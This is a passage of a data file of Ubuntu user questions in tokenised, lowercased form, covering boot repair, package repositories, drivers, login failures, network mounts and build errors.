/rebuildbcd , and rebooted , but it fixed nothing - so i tried the `` nuclear method '' by using the commands : bootsect /nt60 c : /force /mbr , bcdboot c : \windows /s c : - boot-repair-disk ( linux lubuntu ) did n't help me either , i tried common repair and advanced repair . above steps did n't work for me . sda4 is the partition containing the windows os
405765	installing clang+llvm 3.4 from llvm.org into saucy 13.10	i 'm trying to setup saucy to install clang and llvm 3.4 from the official llvm apt repo , but it does n't work . i only get the 3.4 snapshots from ubuntu 's own repos . i followed the instructions from http : //llvm.org/apt/ and added the following to my /etc/apt/sources.list : deb http : //llvm.org/apt/saucy/ llvm-toolchain-saucy main deb-src http : //llvm.org/apt/saucy/ llvm-toolchain-saucy main but after doing an sudo apt-get update , i still only see the packages from the ubuntu repo : $ sudo apt-get -- print-uris download clang-3.4 'http : //se.archive.ubuntu.com/ubuntu/pool/universe/l/llvm-toolchain-snapshot/clang-3.4_3.4~svn183914-1ubuntu1_amd64.deb ' clang-3.4_3.4~svn183914-1ubuntu1_amd64.deb 11996652 sha256:5b5f10b0d90d0654672dca596980616814a5e3eca4346f43011d2e914602bbe5 is this a problem on my end , or is the llvm.org apt repo broken ?
405773	apache2 stop command missing	how do i stop my local apache server ? /etc/init.d/apache2 and service apache2 give only 3 options -- restart , startand status i rebooted my syetem and now sudo /etc/inid.d/apache stop works but does n't give the stop option on tab httpd was missing so i did sudo ln -s /usr/sbin/apachectl /etc/init.d/httpd -- read it on some forum the httpd service now gives start and status option ( again , no stop ) doing sudo /etc/init.d/httpd status says looking up localhost making http connection to localhost alert ! : unable to connect to remote host . lynx : ca n't access startfile http : //localhost/server-status 'www-browser -dump http : //localhost:80/server-status ' failed . maybe you need to install a package providing www-browser or you need to adjust the apache_lynx variable in /etc/apache2/envvars i did install lynx just before making the link by sudo apt-get install lynx why is only the stop missing ? this is just plain weird ...
405774	changing desktops `` workspace switcher ''	back in 2002 i purchased suse linux . the desktop changer was one of the cool features that stood out . it was awesome that i could change desktops with one program here and another on that desktop . it was fast and it is still the main feature that stands out to me regarding linux . unfortunately the best distro in linux is the slowest as far as changing desktops . is there a way to put a desktop changer '' workspace switcher '' as indicator ? i think that this would be nice . not as cool as kde cube but nice . scott .
405775	code base build on 32bit ubuntu 12.04 on x86_64 bit machine is taking more time	i have a code base to be built . i am building it on a 32 bit ubuntu 12.04 lts running on a high end machine ( intel i7 , 16 gb ram , ht enabled ) . but it is taking more time compared to the time taken on intel dual core machine . it is taking almost double time . both the machines have x86_64 processor . high end machine is quad core with ht enabled an 16gb ram , the other one is a dual core with 4gb ram . my expectation was , the build on high end machine should have taken half the time , but it is taking double time . please let me know what is the reason for this . any pointers to debug this issue will be really helpful . thanks in advance .
405776	virtual device not shown in genymotion emulator when run as root	i added a virtual device in genymotion android emulator as non-root and its not showing up when i run genymotion as root . how can i fix that ? how can i share same resources with root and non-root users ? please help
405777	what happened to skype 's wav files ?	skype has been working fine for a fair while , but has ( in the last week or so ) stopped making notification sounds . normal audio for calls is fine , but the ringtone and other alerts are now not making any noise at all . the cause appears to be that the wav files are all missing . i 've not deleted them - at least , not knowingly - and not made any changes within skype . i ran an update and upgrade to my whole system recently , so the cause is likely there , but i have no idea where to start looking to sort this out . is it just going to be simplest to download the sound files and set them all manually , or is this a known issue with another fix ? edit : forgot to say - the sound files are normally ( i believe ) in /usr/share/skype/sounds , but i do n't have a /usr/share/skype folder at all .
405783	how to install network drivers via terminal ?	i have a pc with : 32gb ram 1t harddisk 8 core cpu ubuntu server 12.04 i installed virtualbox and created four vms . i think my mistake was i did n't leave any space for the host so i got `` the system is running in low-graphics mode '' error . i tried to reinstall the os but i keep getting the network configuration error during the installation . i figured out that the problem was with network driver so i tried to install it again using apt-get or via dvd but nothing worked.. to make sure that the problem is the network , i installed windows server and the network was n't working too so i installed the driver and it worked ! so i need to know how to install ubuntu network drivers via terminal , coz i could n't install gui without network : ( please help ! !
405784	ubuntu 12.04lts password is indicated invalid ( greeter and tty ) even if password is correct . passwd fails	today after regular system updates on my 12.04 lts system , i can not login anymore . on a greeter password is said to be invalid immediately ( without the usual delay ) . and on tty the same result , just delay is present this is what i already tried : checking caps lock , keyboard layout and similar things . going into recovery mode root shell , remounting filesystem passwd`ing updating system from apt-get and root shell chroot`ing into my system from liveusb , and executing passwd a little more about passwd , i wanted to change/update my password with passwd on root shell ( recovery mode ) , and from chroot`ed environment ( from liveusb ) . but i could not do so , because i always got an error : my-computer-name # passwd myusername passwd : authentication token manipulation error passwd : password unchanged the filesystem has been remounted to rw correctly , ( i tried to create/edit/save some files with vim ) . in the file /var/log/auth.log i can see one strange message emitted from lightdm , that seems to be related to this issue : pam_winbind ( lightdm : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user pam_succeed_if ( lightdm : auth ) : requirement `` user indgroup nopasswdlogin '' not met by user `` rytis '' these are the packets , that has been updated by update : base-files bind9-host dns-utils libdns libpam-ck-connector libisccc lib-ck-connector0 liblwres80 libbind9-80 libisccfg82 libisc83 consolekit language-pack-gnome-en-base language-pack-gnome-en google-chrome-stable flashplugin-installer language-pack-en-base language-pack-en note : long time ago i set root password for my computer , and while i can not log into root with that password while booting normaly , i can , however , while booting into recovery .
405785	no graphic card performance on mate desktop	i just installed ubuntu 12.04 and installed my nvidia graphic card proprietary drivers ! and that worked fine with the compiz effects ! then i installed mate desktop but there those effects disappeared seems like the graphic card driver does n't do job anymore on mate !
405786	keyboard not working login screen ubuntu 13.10	i have ubunu 13.10 installed on a macbook pro 5,1 . when i turn the computer on the keyboard does not work when i try to login in as the administrator . when i login as the guest user then log out and try to login as the default other user/ administrator it works . i tried the solution of going to system settings/language support/keyboard input method system and changing it to `` none '' rebooted and that did not work . i tried `` ibus '' and that did not work either . does anyone have a solution ? thanks
405787	xubuntu 13.10 and ati radeon 9200se - prop . drivers	i 'm running xubuntu 13.10 with radeon 9200se . it 's working on default drivers of xubuntu . how can i ( and if i can ) install prop . drivers ( catalyst ) ? thanks
405790	how do i resolve a newer package dependency , when the old one is in a higher-priority source ?	when trying to update the `` unity '' package ( and a few other related packages , including unity-2d and libunity-2d-private0 ) , apt-get tells me i can not , as the required dependency is libxi6 > 2:1.6.99.1 , but the actual version installed is 2:1.6.0-0ubuntu2.1 . i have run apt-cache policy libxi6 , and i can see version 2:1.7.1.901-1ubuntu1~precise1 is available in the `` updates '' source , but my installed version comes from the `` security '' source . sadly , my security source has a higher priority ( 990 ) than my updates source ( 900 ) , and so it seems that apt-get can not resolve the dependency issue . i can not see any problems on launchpad regarding this dependency failure , as i would expect either the version of unity in precise-updates would require a libxi6 that is available in security , or there would be a unity package in precise-security that had the correct dependencies . contents of /etc/apt/preferences.d/* : package : * pin : release a=precise-security pin-priority : 990 package : * pin : release a=precise-updates pin-priority : 900 package : * pin : release a=precise-proposed pin-priority : 400 output of apt-cache policy : 100 /var/lib/dpkg/status release a=now 500 https : //private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu/ precise/main i386 packages release v=12.04 , o=lp-ppa-commercial-ppa-uploaders-steam , a=precise , n=precise , l=steam , c=main origin private-ppa.launchpad.net 500 https : //private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu/ precise/main amd64 packages release v=12.04 , o=lp-ppa-commercial-ppa-uploaders-steam , a=precise , n=precise , l=steam , c=main origin private-ppa.launchpad.net 500 http : //dl.google.com/linux/talkplugin/deb/ stable/main i386 packages release v=1.0 , o=google , inc. , a=stable , n=stable , l=google , c=main origin dl.google.com 500 http : //dl.google.com/linux/talkplugin/deb/ stable/main amd64 packages release v=1.0 , o=google , inc. , a=stable , n=stable , l=google , c=main origin dl.google.com 500 http : //repository.spotify.com/ stable/non-free i386 packages release c=non-free origin repository.spotify.com 500 http : //repository.spotify.com/ stable/non-free amd64 packages release c=non-free origin repository.spotify.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/universe translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/universe translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/restricted translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/restricted translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/multiverse translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/multiverse translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/main translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/main translation-en 400 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/universe i386 packages release v=12.04 , o=ubuntu , a=precise-proposed , n=precise , l=ubuntu , c=universe origin gb.archive.ubuntu.com 400 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/multiverse i386 packages release v=12.04 , o=ubuntu , a=precise-proposed , n=precise , l=ubuntu , c=multiverse origin gb.archive.ubuntu.com 400 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/main i386 packages release v=12.04 , o=ubuntu , a=precise-proposed , n=precise , l=ubuntu , c=main origin gb.archive.ubuntu.com 400 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/restricted i386 packages release v=12.04 , o=ubuntu , a=precise-proposed , n=precise , l=ubuntu , c=restricted origin gb.archive.ubuntu.com 400 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/universe amd64 packages release v=12.04 , o=ubuntu , a=precise-proposed , n=precise , l=ubuntu , c=universe origin gb.archive.ubuntu.com 400 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/multiverse amd64 packages release v=12.04 , o=ubuntu , a=precise-proposed , n=precise , l=ubuntu , c=multiverse origin gb.archive.ubuntu.com 400 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/main amd64 packages release v=12.04 , o=ubuntu , a=precise-proposed , n=precise , l=ubuntu , c=main origin gb.archive.ubuntu.com 400 http : //gb.archive.ubuntu.com/ubuntu/ precise-proposed/restricted amd64 packages release v=12.04 , o=ubuntu , a=precise-proposed , n=precise , l=ubuntu , c=restricted origin gb.archive.ubuntu.com 500 http : //archive.canonical.com/ precise/partner i386 packages release v=12.04 , o=canonical , a=precise , n=precise , l=partner archive , c=partner origin archive.canonical.com 500 http : //archive.canonical.com/ precise/partner amd64 packages release v=12.04 , o=canonical , a=precise , n=precise , l=partner archive , c=partner origin archive.canonical.com 500 http : //extras.ubuntu.com/ubuntu/ precise/main i386 packages release v=12.04 , o=lp-ppa-app-review-board , a=precise , n=precise , l=application review board ppa , c=main origin extras.ubuntu.com 500 http : //extras.ubuntu.com/ubuntu/ precise/main amd64 packages release v=12.04 , o=lp-ppa-app-review-board , a=precise , n=precise , l=application review board ppa , c=main origin extras.ubuntu.com 500 http : //security.ubuntu.com/ubuntu/ precise-security/universe translation-en 500 http : //security.ubuntu.com/ubuntu/ precise-security/restricted translation-en 500 http : //security.ubuntu.com/ubuntu/ precise-security/multiverse translation-en 500 http : //security.ubuntu.com/ubuntu/ precise-security/main translation-en 990 http : //security.ubuntu.com/ubuntu/ precise-security/multiverse i386 packages release v=12.04 , o=ubuntu , a=precise-security , n=precise , l=ubuntu , c=multiverse origin security.ubuntu.com 990 http : //security.ubuntu.com/ubuntu/ precise-security/universe i386 packages release v=12.04 , o=ubuntu , a=precise-security , n=precise , l=ubuntu , c=universe origin security.ubuntu.com 990 http : //security.ubuntu.com/ubuntu/ precise-security/restricted i386 packages release v=12.04 , o=ubuntu , a=precise-security , n=precise , l=ubuntu , c=restricted origin security.ubuntu.com 990 http : //security.ubuntu.com/ubuntu/ precise-security/main i386 packages release v=12.04 , o=ubuntu , a=precise-security , n=precise , l=ubuntu , c=main origin security.ubuntu.com 990 http : //security.ubuntu.com/ubuntu/ precise-security/multiverse amd64 packages release v=12.04 , o=ubuntu , a=precise-security , n=precise , l=ubuntu , c=multiverse origin security.ubuntu.com 990 http : //security.ubuntu.com/ubuntu/ precise-security/universe amd64 packages release v=12.04 , o=ubuntu , a=precise-security , n=precise , l=ubuntu , c=universe origin security.ubuntu.com 990 http : //security.ubuntu.com/ubuntu/ precise-security/restricted amd64 packages release v=12.04 , o=ubuntu , a=precise-security , n=precise , l=ubuntu , c=restricted origin security.ubuntu.com 990 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages release v=12.04 , o=ubuntu , a=precise-security , n=precise , l=ubuntu , c=main origin security.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/universe translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/restricted translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/multiverse translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/main translation-en 100 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/multiverse i386 packages release v=12.04 , o=ubuntu , a=precise-backports , n=precise , l=ubuntu , c=multiverse origin gb.archive.ubuntu.com 100 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/universe i386 packages release v=12.04 , o=ubuntu , a=precise-backports , n=precise , l=ubuntu , c=universe origin gb.archive.ubuntu.com 100 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/restricted i386 packages release v=12.04 , o=ubuntu , a=precise-backports , n=precise , l=ubuntu , c=restricted origin gb.archive.ubuntu.com 100 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/main i386 packages release v=12.04 , o=ubuntu , a=precise-backports , n=precise , l=ubuntu , c=main origin gb.archive.ubuntu.com 100 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/multiverse amd64 packages release v=12.04 , o=ubuntu , a=precise-backports , n=precise , l=ubuntu , c=multiverse origin gb.archive.ubuntu.com 100 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/universe amd64 packages release v=12.04 , o=ubuntu , a=precise-backports , n=precise , l=ubuntu , c=universe origin gb.archive.ubuntu.com 100 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/restricted amd64 packages release v=12.04 , o=ubuntu , a=precise-backports , n=precise , l=ubuntu , c=restricted origin gb.archive.ubuntu.com 100 http : //gb.archive.ubuntu.com/ubuntu/ precise-backports/main amd64 packages release v=12.04 , o=ubuntu , a=precise-backports , n=precise , l=ubuntu , c=main origin gb.archive.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/universe translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/universe translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/restricted translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/restricted translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/multiverse translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/multiverse translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main translation-en 900 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/multiverse i386 packages release v=12.04 , o=ubuntu , a=precise-updates , n=precise , l=ubuntu , c=multiverse origin gb.archive.ubuntu.com 900 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/universe i386 packages release v=12.04 , o=ubuntu , a=precise-updates , n=precise , l=ubuntu , c=universe origin gb.archive.ubuntu.com 900 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/restricted i386 packages release v=12.04 , o=ubuntu , a=precise-updates , n=precise , l=ubuntu , c=restricted origin gb.archive.ubuntu.com 900 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main i386 packages release v=12.04 , o=ubuntu , a=precise-updates , n=precise , l=ubuntu , c=main origin gb.archive.ubuntu.com 900 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/multiverse amd64 packages release v=12.04 , o=ubuntu , a=precise-updates , n=precise , l=ubuntu , c=multiverse origin gb.archive.ubuntu.com 900 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/universe amd64 packages release v=12.04 , o=ubuntu , a=precise-updates , n=precise , l=ubuntu , c=universe origin gb.archive.ubuntu.com 900 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/restricted amd64 packages release v=12.04 , o=ubuntu , a=precise-updates , n=precise , l=ubuntu , c=restricted origin gb.archive.ubuntu.com 900 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages release v=12.04 , o=ubuntu , a=precise-updates , n=precise , l=ubuntu , c=main origin gb.archive.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/universe translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/universe translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/restricted translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/restricted translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/multiverse translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/multiverse translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main translation-en_gb 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main translation-en 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/multiverse i386 packages release v=12.04 , o=ubuntu , a=precise , n=precise , l=ubuntu , c=multiverse origin gb.archive.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/universe i386 packages release v=12.04 , o=ubuntu , a=precise , n=precise , l=ubuntu , c=universe origin gb.archive.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/restricted i386 packages release v=12.04 , o=ubuntu , a=precise , n=precise , l=ubuntu , c=restricted origin gb.archive.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main i386 packages release v=12.04 , o=ubuntu , a=precise , n=precise , l=ubuntu , c=main origin gb.archive.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/multiverse amd64 packages release v=12.04 , o=ubuntu , a=precise , n=precise , l=ubuntu , c=multiverse origin gb.archive.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/universe amd64 packages release v=12.04 , o=ubuntu , a=precise , n=precise , l=ubuntu , c=universe origin gb.archive.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/restricted amd64 packages release v=12.04 , o=ubuntu , a=precise , n=precise , l=ubuntu , c=restricted origin gb.archive.ubuntu.com 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main amd64 packages release v=12.04 , o=ubuntu , a=precise , n=precise , l=ubuntu , c=main origin gb.archive.ubuntu.com
405791	unable to dual boot ubuntu and window 8	i have installed ubuntu on another free disk area using something else option with drive mounting as ext4 . i have disabled secure boot option of window 8 ( which came pre-installed ) . after installation i do n't get dual boot option . the window 8 only boots up . can anyone help
405793	screen goes blank while installing ubuntu 13.10	i am trying to install ubuntu 13.10 . i have downloaded 13.10 from the ubuntu website and also the ubuntu installer for making a bootable usb . after creating a bootable usb successfully , when i boot from the usb drive to install ubuntu and select my language , the screen goes black . by black i mean as though there is no power . what should i do ? help please !
405795	how can i turn my screen mode to grayscale ?	i would like to temporarily turn my screen gray , to estimate how certain images would appear if printed with a black-and-white printer . i think xcalib could do it but i do n't know how . does anyone know how to get the desired effect ? for instance , to view inverted colors , i run xcalib -invert -alter to toggle the effect and it works great . is there a similar way to get a grayscale screen ?
405798	wireless driver for thinkpad edge e335	i just installed ubuntu 12.04 lts on a brand new ( no os ) thinkpad edge e335 . everything seems to work just fine , but there appears to be no driver for the wireless hardware ( wlan thinkpad 11 a/b/g/n ) . there also seems to be no support on the ubuntu certified hardware site . lenovo itself offers only windows drivers . will it follow soon or should i maybe try ubuntu 13.10 ? any other solutions ? has anyone had the same problem ?
405799	problem to search a word in pdf file with `` document viewer '' ?	i 'm using ubuntu 12.04 64 bit . i downloaded a pdf file for my academic requirements . when i open this pdf with document viewer , it displays the contents of the file . however , when i start searching ( with ctrl+f ) for a word in the file , it gives me `` no word is found '' for every attempt even though it is present the file ? how can i search for the word in the pdf ?
405800	installation problem xdg-desktop-menu : no writable system menu directory found	when installing the ibm tsm backup client i have the following message on lucid ( works on precise ) > sudo apt-get upgrade setting up tsm-client ( 6.4.0.7-3 ) ... xdg-desktop-menu : no writable system menu directory found . dpkg : error processing tsm-client ( -- configure ) : subprocess installed post-installation script returned error exit status 3 errors were encountered while processing : tsm-client e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what is the problem here ?
405801	how to install the correct nvidia driver gt218 ion ?	this is my first post so i hope i 'm doing everything right . i 've been trying to fix this for a few days now with no joy . i installed ubuntu 13.10 on my revo 3700 . everything works with the nouveau driver although of course i 'm stuck on 800x600 and the gui is very jerky . the revo has an ion chip which is reported in ubuntu as gt218 [ ion ] . i went into software and updates and installed the nvidia driver 319 . rebooted and got a blank screen with a blinking cursor after the splash . since then i 've booted into recovery mode about 1million times and tried all sorts : installing nvidia driver 304 from software and updates installing nvidia driver 319 using the .run file from the nvidia site installed using sudo apt-get install nvidia-current and blacklisted nouveau myself all of these have the same result which makes me think i 'm missing something fundamental . i keep having to reboot and delete my xorg.conf file to get back to nouveau which is very time consuming . one perhaps important detail is that i 'm doing this from the hdmi port on the revo as this is the only display i have to use at home . everything appears on here though including a blinking cursor so i figured it 's ok ? does anyone have any other fixes i can try ? edit : i tried all suggested to no avail . at the weekend i 'll try the new nvidia drivers that have come out since i asked
405802	how do i kill locked mythtv frontend	i have a new install of ubuntu 13.10 with mythtv .27 installed . after configuring mythtv fe i tried to exit . it would not let me exit . i tried several times without success . because mythtv fe loads full screen i did n't have access to any other means of exiting ubuntu . i was forced to reboot the computer . after the reboot ubuntu automatically loaded mytyuhtv fe , again in full screen mode . i tried to exit mythtv fe as before but the command is ignored leaving me with a locked computer . basically my only options is to prevent mythtv fe from automatically loading after the reboot . until i can accomplish that the computer is basically useless . here 's where i need help because i do n't know how to accomplish that . any assistance will be appreciated
405810	using gnome-disks/terminal to format usb drive in ubuntu 12.10 , fat32	i know its a duplicate question , but i could n't find a answer that would have satisfied me.. i recently upgraded to ubuntu 12.10 , you know i was holding with the lts but could n't resist all those new enhancements either . so now the disk utility is gone . so some existing posts on `` how to format a usb '' refer to using disks , selecting more actions and then format ... i do n't know if i am doing right ? see here . and then i go for edit partition type and now i see a lot of option for fat32 . which one to select ? and if i use terminal- is this correct ? i need citation . $ sudo mkfs.vfat /dev/sdb1 i also tried using gparted , but it wont allow me formating . see here . i 'd prefer to use terminal : )
405811	adding item to sound menu	i made a little python app that posts the song i 'm listening to on twitter . i added its .desktop to the sound menu alright , but it shows up with the prev - play/pause - next controls ( just like any media player ) . i added it by copying its .desktop to ~/.local/share/applications/ and ( in dconf-editor ) added it to /com/canonical/indicator/sound/interested-media-players/ too . is there any way to display it just as a simple menu item ( without the unnecessary and nonfunctional control buttons ) , like the `` sound settings '' at the bottom of the menu ? i tried looking through the .desktop specification , but i could n't find any hints .
405814	i accidentally deleted my home folder and trash bin ( ubuntu 12.04 )	i accidentally deleted the files folders from /usr/share/application , and now i ca n't open the trash bin from the unity panel . and i ca n't open any of my folders from the dash . also , my home folder is missing from the panel ( or launcher ) . i ran gksu nautilus /usr/share/application/ and deleted a couple of files folders by mistake . when i open the trash bin from a window , the folders i deleted are not in there so i ca n't restore them .
405819	missed libraries ( lidn , lldap )	command make induces error message /usr/bin/ld : can not find -lidn /usr/bin/ld : can not find -lldap collect2 : ld returned 1 exit status make [ 2 ] : *** [ ../bin/someapp ] error 1 make [ 1 ] : *** [ cmakefiles/someapp.dir/all ] error 2 make : *** [ all ] error 2 however , lgconfig -p | grep idn returns libidn.so.11 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/libidn.so.11 libcidn.so.1 ( libc6 , x86-64 , os abi : linux 2.6.24 ) = > /lib/x86_64-linux-gnu/libcidn.so.1 libcidn.so.1 ( libc6 , os abi : linux 2.6.24 ) = > /lib/i386-linux-gnu/libcidn.so.1 libcidn.so ( libc6 , x86-64 , os abi : linux 2.6.24 ) = > /usr/lib/x86_64-linux-gnu/libcidn.so and ldconfig -p | grep ldap returns libldap_r-2.4.so.2 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/libldap_r-2.4.so.2 libldap_r-2.4.so.2 ( libc6 ) = > /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2 how i can rid off this linking errors ?
405820	missing libtiff.so.3 when running trackvis	i downloaded trackvis and the diffusion toolkit and i installed all correctly in ubuntu 12.04 . the problem is when i try to launch the program ; the following error appears : ./trackvis : error while loading shared libraries : libtiff.so.3 : can not open shared object file : no such file or directory could you help me ?
405822	suggest an advanced text editor for ubuntu	i am looking for a text editor with advanced capabilities . for example ; i should be able to expand and collapse xml codes/sections ( or c/c++ sections ) easily . something similar notepad++ for windows . also , if it can additionally create a table of contents from the tags that would be even more good !
405823	how can i mount network cifs folder ?	my sw ntfs shared directory is an installation directory on a windows 2008 server . i 'm using ubuntu 12.04 i did the mkdir /media/sw and smbclient -l successfully ... then while in root i tried mount -t cifs -o user=username , ro //132.72.116.14/sw /media/sw and got : mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs )
405826	can i have both postfix and exim installed ?	i have an ubuntu mail server that i want to migrate from exim to postfix . this server has 2 ip addresses . my question is simple : can i have both postfix and exim installed , listening in different ip 's ? this would allow me to 1. test postfix installation before doing the migration 2. since i have several domains hosted here i could migrate the domains one by one allowing to test it or go back if something goes wrong .
405827	boot error after installing cuda 5	i have just installed cuda on ubuntu 13.10 as described here : sn0v.wordpress.com/2012/12/07/installing-cuda-5-on-ubuntu-12-04 and the cuda installer completes with no errors . i then rebooted and it gave me a big black screen with `` boot error '' on it .
405833	grub menu does n't render properly	i just dual-booted my windows 8.1 with ubuntu 12.04.03 on uefi . no problems . the only thing is that the grub menu does n't render properly . the text is all jagged up . here 's what i see : what do i do ? ?
405834	grub rescue : boot-repair solution did n't work	i have my disk partitioned with windows & ubuntu 13.10 . i wanted to format my windows 7 partition so i entered the windows recovery environment . when trying to format windows , an error appeared and said that i should restart my computer and try again , but when i restarted my computer it gave the message `` error no such partition , entering rescue mode ... grub rescue '' looking at the forums i found that one solution was to start the computer from a usb with boot-repair burnt into it . i did it and followed all the steps to repair the booting but when i turn on my computer it just stays on a black screen with a flashing dash on the top left corner . when the boot-repair-disk finished gave me this url in case id had n't worked : http : //paste.ubuntu.com/6755505/ screenshot of the app gparted using parted magic
405835	i 'm in the current development version after doing `` do-release-upgrade -d '' , why ?	i do n't know how , but i was upgrading from ubuntu 11.10 using : sudo do-release-upgrade -d then after the upgrade and a reboot , i did : sudo lsb_release -a and got : no lsb modules are available . distributor id : ubuntu description : ubuntu trusty tahr ( development branch ) release : 14.04 codename : trusty how was this possible ? is it possible to downgrade without a rebuild ? i guess i 'm an alpha tester for 14.04 now ?
405836	install gimp 's felimage plugin	i am following a tutorial and the step i 'm at requires to apply a filter `` felimage '' . however , i can not install it . running ./configure says that i do not meet the gimp version requirement : configure : error : package requirements ( gimp-2.0 > = 2.2.0 gimpui-2.0 > = 2.2.0 ) were not met . consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively you may set the gimp_cflags and gimp_libs environment variables to avoid the need to call pkg-config . see the pkg-config man page for more details . however , if i run gimp -- version , i get the output gnu image manipulation program version 2.8.10 i tried installing gimp 's plugin registry package , but nothing useful there . how can i install felimage on ubuntu 13.10 ? ** edit ** from the author , guillermo : i see , try installing libgimp2.0-dev ( and libglib2.0-dev if it isn't there already ) as well , and let me know if that does n't fix the issue . thus , sudo apt-get install libgimp2.0-dev libglib2.0-dev later and ./configure works . however , make does not and fails with gcc -g -o2 -wall -o felimage-noise basis.o cell_3d.o cell_4d.o cell_5d.o interface.o lnoise_3d.o lnoise_4d.o lnoise_5d.o loadconf.o main.o poisson.o random.o render.o saveconf.o snoise_3d.o snoise_4d.o snoise_5d.o -lgimpui-2.0 -lgimpwidgets-2.0 -lgimpmodule-2.0 -lgimp-2.0 -lgimpmath-2.0 -lgimpconfig-2.0 -lgimpcolor-2.0 -lgimpbase-2.0 -lgtk-x11-2.0 -lgdk-x11-2.0 -latk-1.0 -lgio-2.0 -lpangoft2-1.0 -lpangocairo-1.0 -lgdk_pixbuf-2.0 -lcairo -lpango-1.0 -lfreetype -lfontconfig -lgobject-2.0 -lglib-2.0 /usr/bin/ld : lnoise_3d.o : undefined reference to symbol 'floor @ @ glibc_2.2.5' /lib/x86_64-linux-gnu/libm.so.6 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ felimage-noise ] error 1
